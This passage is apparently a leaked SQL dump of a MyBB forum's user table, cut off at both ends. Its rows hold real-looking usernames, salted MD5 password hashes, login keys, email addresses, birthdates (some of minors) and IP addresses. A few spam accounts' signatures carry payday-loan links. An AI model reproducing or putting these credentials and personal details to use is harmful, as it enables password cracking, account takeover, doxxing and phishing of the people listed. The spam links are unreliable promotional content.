'1315553019', '', '1597', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('282', 'scaryypanda', '980406706013db6a23ca7b8842625b39', 'QBW2T1Kf', 'WiXbtp8Grc94tPgKgBLhhVqRkQJovwVYR23QnrtU5CaVAWyh1Q', 'conner.a.coleman@gmail.com', '0', '', '', '', '2', '', '0', '', '1350673489', '1350674090', '1350673489', '0', '', '0', '', '', '', '24-7-1995', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '208.94.131.5', '208.94.131.5', '-799112443', '-799112443', '', '601', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('283', 'Vee', 'a305a588ae29b9d81c5921d7b25a2233', 'ta12BiEY', 'MVbulxta4azRd3OBhyz5olnw2APZQJPd7DsPF3Ay8K8JKPMwFx', 'espeon@null.net', '0', '', '', '', '2', '', '0', '', '1350732720', '1350732865', '1350732720', '0', '', '0', '', '', '', '19-11-1991', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '122.149.177.181', '122.149.177.181', '2056630709', '2056630709', '', '145', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('285', 'dccfoux', 'f6e500a1b00280ec9f8cfbf28a99d3d0', 'wLi8R2aK', 'rKxFo8RoqEaSCHPGmRccbJvZjzfTLZCz6bIEOF6HQ6V1JrxbdL', 'dccfoux@gmail.com', '8', '', '', '', '2', '', '0', '', '1350907995', '1351030889', '1350995432', '1351030378', '', '0', '', '', '', '27-5-1991', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '1', '0', '0', '71.239.97.104', '71.239.97.104', '1206870376', '1206870376', '', '3389', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('284', 'h3rcul3s', '0a5db725dfeb934a4d8c09f470db9a4b', 'gcAoNtEJ', '9ff2aPmyJcNuuCYp8RKWklTb2bJ8KxgYnWJ7p4TyyKWcvvSLRB', 'h3rcul3an@yahoo.com', '1', './uploads/avatars/avatar_284.jpg?dateline=1350911283', '120|75', 'upload', '2', '', '0', '', '1350904171', '1350919398', '1350911522', '1350916547', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '209.73.132.91', '31.172.30.3', '-783711141', '531373571', '', '3340', '1', '2', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('286', 'cxr37', 'a1492468ef15058c2387c69cb70142c1', 'Gp5kSKom', 'hPIgEA2UM5sD5RDk5fHOqYyoyhRHRS6HfdCVPL5Uyz1MpKeo1B', 'frank@exosfera.com', '0', '', '', '', '2', '', '0', '', '1350926848', '1350943601', '1350926848', '0', '', '0', '', '', '', '29-3-1986', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '189.231.170.101', '189.231.170.101', '-1108891035', '-1108891035', '', '1183', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('287', 'DariusB1979', '2d8952c8ccdd8cf80fc89af142807a3d', 'j8mQ8ju7', '24a9K9cX1WGhbt8RaZTVe5QmWKmiHISKF5XPeKArpt2C3WBqDw', 'Marvawux7678@yahoo.com', '0', '', '', '', '2', '', '0', '', '1350978794', '1351165666', '1350978794', '0', 'http://communities.bentley.com/members/jenamejia1970/default.aspx', '0', '', '', '', '10-8-1955', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '129.121.101.56', '129.121.102.35', '-2122750664', '-2122750429', '', '4', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('289', 'Nameless', '30d4fcf872e1ff5db79e45796937b409', 'ZYiwugL8', 'k2hH7U9EZGGkf5U4wVYUFvCOuQ82h6mM2TzcJUYVkZaAys4coh', 'br0k3n@live.se', '0', '', '', '', '2', '', '0', '', '1351091765', '1351093757', '1351091765', '0', '', '0', '', '', '', '5-1-1990', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '78.70.49.201', '78.70.49.201', '1313223113', '1313223113', '', '1992', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('328', 'Miller', 'e3fd34d6dc6cd012920c5bb484f6f777', '4BbRtsIv', 'BI3mttJwwGpqrw6o5I8iPf8FvBLWSj6PQc32nDRzWGhH3CxxQY', 'donmiller@live.co.uk', '0', '', '', '', '14', '', '0', '', '1352258721', '1352259068', '1352259068', '0', '', '0', '', '', '', '4-5-1991', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '94.168.90.223', '94.168.90.223', '1588091615', '1588091615', '', '347', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('291', 'xXGANNONXx', '62972c077f4e7f2c20041e2939d91e56', 'VM6ICnMt', '7hMU1AXlqFaLmI29iKdARgbcDQz5LUWqJ4wIuRWTPyn3eTgEIh', 'garrylongthorn@hotmail.com', '6', './uploads/avatars/avatar_291.jpg?dateline=1351130228', '120|90', 'upload', '2', '', '0', '', '1351130000', '1351476085', '1351206742', '1351132695', '', '0', '', '', '', '14-7-1997', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '257', '0', '3', '203.104.11.14', '203.104.11.12', '-882373874', '-882373876', '', '3344', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('292', 'Hollywood0Undead', 'abd386481ca71d77693ca4a4b29d0bcb', 'RscbgkiC', 'Fg3Yk316Hj2xYaDKRg8PYOC1hWOz5IjfbaWQE1TK6Wztpffmro', 'littledevil_141412@yahoo.com', '0', '', '', '', '2', '', '0', '', '1351238750', '1351239004', '1351238750', '0', '', '0', '', '', '', '21-12-1991', 'all', '', '1', '1', '0', '1', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '257', '0', '0', '216.218.102.116', '216.218.102.116', '-656775564', '-656775564', '', '254', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('295', 'Lollipop123', 'cbe007e60edebe6f72cac1de1a3f756d', 'kRDpMDXA', 'MQDSmRfnfII5XAtRCWAdL57SI42hxSVceKkXZJeEbIsBwPUTxb', 'MOON_BOY777@hotmail.com', '4', '', '', '', '2', '', '0', '', '1351321460', '1351340217', '1351340217', '1351321849', '', '0', '', '', '', '15-8-1998', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '257', '0', '0', '203.104.11.9', '122.108.192.197', '-882373879', '2053947589', '', '403', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('293', 'Knowledge', '621e6b6986f4119795b1cac8d44e0fd9', 'VcoNokMH', 'ZT9fPbt1AUyJdMd2lJoHVnUeq3ykaY2kURYcXkSclOVlWmN8Pr', 'Anas_a.ha@hotmail.com', '0', '', '', '', '2', '', '0', '', '1351282538', '1351971786', '1351524492', '0', '', '0', '', '', '', '11-5-1993', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '228', '0', '0', '83.83.167.183', '41.250.224.98', '1397991351', '704307298', '', '12', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('294', 'vudu3d', 'e041e47d99de069929e57945a71dc669', 'MEFgdTvG', 'SOLyIalPOEVqkXeeFZq3P8v6AqRSH1eOLTxyrscZPZiwLZ2Rhf', 'galeradapulia@gmail.com', '0', '', '', '', '2', '', '0', '', '1351309115', '1351894585', '1351309473', '0', '', '0', '', '', '', '5-1-1988', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '186.244.220.47', '201.50.255.69', '-1158357969', '-919404731', '', '358', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('296', 'Artor', '0852e2f4d3dad29f5532e9346684cc77', 'd8Q3itQR', 'xKkgZufKaTsTQZQyfWE5oVLrEVpl3pSJtHfAod3lFPbdxygCPt', 'o2614372@rtrtr.com', '0', '', '', '', '2', '', '0', '', '1351342217', '1351343062', '1351342217', '0', '', '0', '', '', '', '18-11-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '91.148.160.213', '91.148.160.213', '1536467157', '1536467157', '', '845', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('297', 'skumfuk', 'c73ea33d33ebf97ee5f96d835e118487', 'Ly9boxG5', 'q3ItNfOyqbv4SB2A4salAZlqh9YxblNBGMg7vu6SpzUBDILQOU', 'phuthuynho93@gmail.com', '0', '', '', '', '2', '', '0', '', '1351342530', '1352145936', '1352144754', '0', '', '0', '', '', '', '29-12-1993', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '113.23.6.183', '118.71.125.18', '1897334455', '1984396562', '', '780', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('298', 'amrindersingh', '3f7a4c3566d4a6ff474e906641766ba7', '9N9ouV8E', 'NGz64Eeuq3hhk17DbUJSlXe6VAwTAfqh4Miz6u5KmYRPoUnYpK', 'amit_gatewaysol@yahoo.co.uk', '0', '', '', '', '2', '', '0', '', '1351343949', '1351343949', '1351343949', '0', '', '0', '', '', '', '2-3-1975', 'all', '', '1', '0', '1', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '124.253.71.169', '', '2096973737', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('299', 'COLENTE', 'dbaca1d5ffa50ebf3720e86f7655c047', 'ytmvXRgD', 'wwytWf24SZtfE6ZHlQSMwXCguzmQVAEXWMTFpcKU8no31KYf2U', 'edna_carson@yahoo.com', '0', '', '', '', '2', '', '0', '', '1351403535', '1351452752', '1351420688', '0', '', '0', '', '', '', '31-12-1980', 'all', '', '1', '0', '0', '1', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '69.132.1.54', '69.132.1.54', '1166278966', '1166278966', '', '87', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('300', 'e-w3b', 'fadd103d5c26c4921bfa76a05621f80a', 'HDWo7ScA', '2BMK5FxDSMZpI9mDPsTP2S8juH7yOtnst1MrNbxJiUwwYoszoQ', 'e_w3b@yahoo.com', '0', '', '', '', '2', '', '0', '', '1351459447', '1351460256', '1351459447', '0', '', '0', '', '', '', '4-9-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '81.34.148.34', '81.34.148.34', '1361220642', '1361220642', '', '809', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('301', 'HiramH1956', 'adfa96b55933c063c91d682d581c2b2e', 'ZxXG7dyW', 'tM4jVJfWl8KtKeyMVqfXK2A4NDHNsczQHcJrXk17ipHxyvJ8QW', 'Janezdj8732@yahoo.com', '0', '', '', '', '2', '', '0', '', '1351460290', '1351702345', '1351460290', '0', 'http://ostatic.org/member/richardjoyner1942', '0', '', '', '', '19-3-1955', 'all', '[url=http://www.ooizit.com/members/aristotlemaxwell1936/]online payday loans direct lenders[/url] [url=http://www.extratasty.com/profile/59605/cameranleon1969]one hour payday loans no credit check[/url]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '129.121.100.27', '129.121.104.93', '-2122750949', '-2122749859', '', '6', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('303', 'kroker', 'bd9c58e9932e8dad9fe7f2f588ed8302', 'EZV9539g', '8sPAWvTNfvbjlvUZ9ELadAxDlosJK6DFh2qXCTPrN2PkSxD6Fv', '2012worldend@mail.com', '0', '', '', '', '2', '', '0', '', '1351528448', '1351528448', '1351528448', '0', '', '0', '', '', '', '1-1-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '173.0.3.174', '', '-1392507986', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('302', 'Mac Miller', 'cf03f9e3c3720beddb31613f67150e8c', 'QNFDD89A', 'KReKAzvaX5TlDRMzjOWzQTriKmlAS7oynAZyemf1c2EPJORWEt', 'ChesterTurner200@gmail.com', '23', './uploads/avatars/avatar_302.jpg?dateline=1351527693', '102|102', 'upload', '14', '', '0', '', '1351121391', '1351808164', '1351704922', '1351698117', '', '0', '', '', '', '4-7-1996', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-5', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '208.67.117.50', '74.240.167.148', '-800885454', '1257285524', '', '12798', '1', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:1:{s:4:\"acid\";a:2:{i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}}', '0'); INSERT INTO mybb_users VALUES('304', 'anonymous_sam', 'aa5e42fe6e7081b049eec99af10fa1e4', 'OzntfWxJ', '8ylU8Iar7Q7QDDlOaLaTw4w1fVHMWGg3nKzazS9nlfDQIZkBBH', 'sam.alsayed@hotmail.com', '1', '', '', '', '2', '', '0', '', '1351548696', '1351602535', '1351599335', '1351549369', '', '0', '', '', '', '27-7-1996', 'none', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '109.63.12.49', '109.63.12.49', '1832848433', '1832848433', '', '2065', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('305', 'sithgecko', 'a740bf21ae382f001d64577e5598e5cd', 'qHwsSRid', '4Sit6LTDYn6jpoGb6AJqtwi9N3cbIC9thYRs38GO3CN6gMqpE9', 'sithgecko@gmail.com', '0', '', '', '', '2', '', '0', '', '1351605801', '1351608870', '1351606198', '0', '', '0', '', '', '', '2-4-1970', 'all', '', '1', '1', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-6', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '24.223.234.22', '24.223.234.22', '417327638', '417327638', '', '768', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('306', 'CommandoModz', '2cf5b19a139342acacc94dde09b39eeb', 'SYdbNI3I', '3ORqh6LOqDZaprRAmoEePS4r5DS1JcVwk4Kqod94w1BTRzu6oq', 'zacmalone16@live.com', '6', '', '', '', '2', '', '0', '', '1351612618', '1352164510', '1352162268', '1352160576', '', '0', '', '', '', '12-9-1997', 'all', '', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '1', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '184.6.224.250', '184.6.224.250', '-1207508742', '-1207508742', '', '6374', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('307', 'dextr0pur', 'ec897e570522db5a63ce44c528a318ff', 'sudHVWMv', 'Z8GK3ceSRQuPa5UbJXJ485EJUIj45y9EQvWXD7yiuxnunp62s2', 'dextr0pur@mail.md', '0', '', '', '', '2', '', '0', '', '1351662517', '1351662543', '1351662517', '0', '', '0', '', '', '', '6-10-1984', 'all', '', '1', '1', '0', '1', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '228', '0', '0', '178.63.247.151', '178.63.247.151', '-1304430697', '-1304430697', '', '26', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('308', 'zagis19', '90cba145368f7f55211c9dfaedc27d3b', 'mpT4Y35z', '9nAi8ooxElPpQ8WSLXEDX8KkCDFXaKXSuij7fvDLcPDkx9NmDy', 'artax19@inbox.lv', '0', '', '', '', '2', '', '0', '', '1351732230', '1352330487', '1351734181', '0', '', '0', '', '', '', '9-3-1989', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '2', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '46.109.225.132', '46.109.225.132', '778953092', '778953092', '', '892', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('309', 'flawed', 'f6cdfce570b7bbd40fc28d249f98c589', 'VniMLOlU', 'CoVgLDQOUtTmAoR4SnMKb8l7VtWZZgh8aN45GbqiOxkSKdQTH2', 'gereksiz159@hotmail.com', '0', '', '', '', '2', '', '0', '', '1351779339', '1351780680', '1351779339', '0', '', '0', '', '', '', '19-3-1987', 'all', '', '1', '0', '1', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '95.10.175.178', '95.10.175.178', '1594535858', '1594535858', '', '1406', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('311', 'GreyPhantom', '5a62d5582a30743494d0f54b8772a858', '6PDEFvA8', 'GqR9gXPQxV3wuvYaNdm6Y4PaYrVygPbSmUpwf1fJVT2dt9LyC3', 'nb_ed143@yahoo.com', '0', '', '', '', '2', '', '0', '', '1351798564', '1352518062', '1352300521', '0', '', '0', '', '', '', '2-9-1996', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '112.210.42.136', '112.210.100.164', '1892821640', '1892836516', '', '214', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('310', 'amir12011', '01ddfb3f144d754a2c12f90b2d61f63f', '3zxHhosp', 'TSwb8VBS6xt8JQn7obj2kiV2lHWE7LrEOgM6hikpZNnUtVTyY7', 'youyou102@hotmail.fr', '0', '', '', '', '2', '', '0', '', '1351789824', '1351894538', '1351892894', '0', '', '0', '', '', '', '4-1-1990', 'all', '', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '257', '0', '0', '41.104.91.124', '41.104.87.48', '694705020', '694703920', '', '7760', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('312', 'rayane888', 'bb27415ca8512769084318173bcae262', 'j3nhFliJ', 'CU6irbop5C57VmtI9psAR1LwT8rEdLQNflTFUSmbY5mwveUCuj', 'rayane424888@gmail.com', '0', '', '', '', '2', '', '0', '', '1351804547', '1351965282', '1351808284', '0', '', '0', '', '', '', '9-11-1989', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '41.200.51.232', '41.200.43.51', '700986344', '700984115', '', '2277', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('313', 'LSD', '0f91f08bba1edab5ac45fbb5f1d60ddc', '6dmFziBI', 'mdjKKJ8GT4WQu3RRJZL2kJfjzrxK76cP2nTdeqMhKrw8qldn1O', 'officialpyrox@gmail.com', '1', '', '', '', '2', '', '0', '', '1351876325', '1351877109', '1351876325', '1351876624', '', '0', '', '', '', '10-4-1997', 'all', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '257', '0', '3', '69.125.203.115', '69.125.203.115', '1165871987', '1165871987', '', '784', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('314', 'JesseH1980', '9ef3beed8254b1d9b5b225200e0d5f84', 'b4oPgGTS', 'wtlFRAcH4XmuwGZQnNfPWTrIVSJUnlUkzjKulU82eipQMpyoWI', 'Estherhfj4040@yahoo.com', '0', '', '', '', '2', '', '0', '', '1351879481', '1352006222', '1351879481', '0', 'http://communities.bentley.com/members/jenamejia1970/default.aspx', '0', '', '', '', '23-4-1955', 'all', '[url=http://politics4all.com/users/ClaytonCooke1990/blog/47179-actual-payday-loan-lenders-fast-cash-loans-loans-to-solve-your-emergent-needs]cash advance in 1 hour[/url]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '129.121.103.197', '129.121.101.56', '-2122750011', '-2122750664', '', '7', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('315', 'kanep', '94591be0b96e38ea72f469adf45e4107', 'E8HZrZO1', 'e58UEIQHawjNtLvBMObltvdLyziL5Q6XRoy7qF545hnsfHJi3I', 'nilszzz@hotmail.com', '0', '', '', '', '2', '', '0', '', '1351936748', '1351937610', '1351936748', '0', '', '0', '', '', '', '30-6-1994', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '194.150.65.31', '194.150.65.31', '-1030340321', '-1030340321', '', '862', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('318', 'CrayCrayManiac', '54fbc0521d499ba83109576beb83f02c', '9UDsUMRr', 'KH88KJEnHnLIpB5Em2CxJZNYiEufVY7yzhXJTEbisqvhbi4mjZ', 'craycraymaniac@gmail.com', '0', '', '', '', '2', '', '0', '', '1351983326', '1351985775', '1351983326', '0', '', '0', '', '', '', '17-12-1982', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '174.31.250.155', '174.31.250.155', '-1373635941', '-1373635941', '', '2471', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('319', 'xcore03', 'c73c77da1d13e80c5bd9424163136a3c', 'vbjVufWw', 'cuV6HNdUpCIcN4Y78tN61IhzEzFOqjEIoLiAnfilKhuEEf4N9U', 'xcore@spamhereplease.com', '0', '', '', '', '2', '', '0', '', '1352018641', '1352201191', '1352040537', '0', '', '0', '', '', '', '25-12-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '223', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '121.54.47.52', '173.0.11.244', '2033594164', '-1392505868', '', '3392', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '3', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('320', 'Lordsimo', 'f91f2e894243f6afe24213c6a607f411', 'hERBCo8R', 'BckUA1crnYs7hm9tBJjk1lkMuYfXP1xl8SWxtnSVjUxd7gAr7U', 'Lordsimo@gmail.com', '0', '', '', '', '2', '', '0', '', '1352034577', '1352034824', '1352034577', '0', '', '0', '', '', '', '4-1-1984', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '79.24.200.253', '79.24.200.253', '1327024381', '1327024381', '', '247', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('321', 'tmac30', '753c4aef2b83f95f1297ee1d3fb95421', 'QZvwO1et', 'Ay4LBDnjyzOqAOu8pGhgZv3D4ivWhKU9SBrSSJAgKqKiIJOOrd', 'rjackson123451@gmail.com', '0', '', '', '', '2', '', '0', '', '1352125390', '1352127957', '1352125940', '0', '', '0', '', '', '', '23-12-1993', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', 